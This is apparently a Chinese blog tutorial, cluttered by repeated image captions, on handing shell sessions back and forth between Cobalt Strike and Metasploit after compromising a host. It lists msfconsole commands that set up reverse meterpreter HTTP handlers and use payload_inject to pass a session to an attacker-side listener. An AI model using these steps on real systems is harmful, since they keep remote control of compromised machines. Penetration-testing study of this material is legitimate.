Cobalt Strike获得shell之后 如何与msf联动

本机做cs,vps做msf

1.Cobalt Strike派生会话给Metasploit

(1)对msf进行设置
使用xshell连接vps,进入msfconsole
对msf的设置如下:

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reversez_http
set lhost 172.(这边的ip是服务器的内网地址)
set lport 7777

Cobalt Strike获得shell之后 如何与msf联动(run)
(2)对cs进行设置
先设置一个新的监听,这边的IP地址为服务器的外网地址,payload为foreign HTTP,因为此cs不支持直接使用TCP,所以走HTTP的协议(上面的msf也是设置为http)
Cobalt Strike获得shell之后 如何与msf联动
右击选择spawn(获得会话)功能,选择刚刚建立的监听器
Cobalt Strike获得shell之后 如何与msf联动Cobalt Strike获得shell之后 如何与msf联动可以看到msf界面如下,msf获得会话
Cobalt Strike获得shell之后 如何与msf联动可以尝试执行命令:
Cobalt Strike获得shell之后 如何与msf联动

2.Metasploit派生会话转交给Cobalt Strike

(1)在cs新建一个监听
Cobalt Strike获得shell之后 如何与msf联动

(2)msf设置cs正在监听的地址和端口

use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true(禁用handler监听,因为我们已经建立监听了所以不用新建)
set lhost 47.
set lport 8088

Cobalt Strike获得shell之后 如何与msf联动

Cobalt Strike获得shell之后 如何与msf联动Cobalt Strike获得shell之后 如何与msf联动
此时在cs可以看到msf传递的派生出来的新的会话了!

Cobalt Strike获得shell之后 如何与msf联动

上一篇:端口转发1:通过MSF实现


下一篇:linux安装metasploit-framework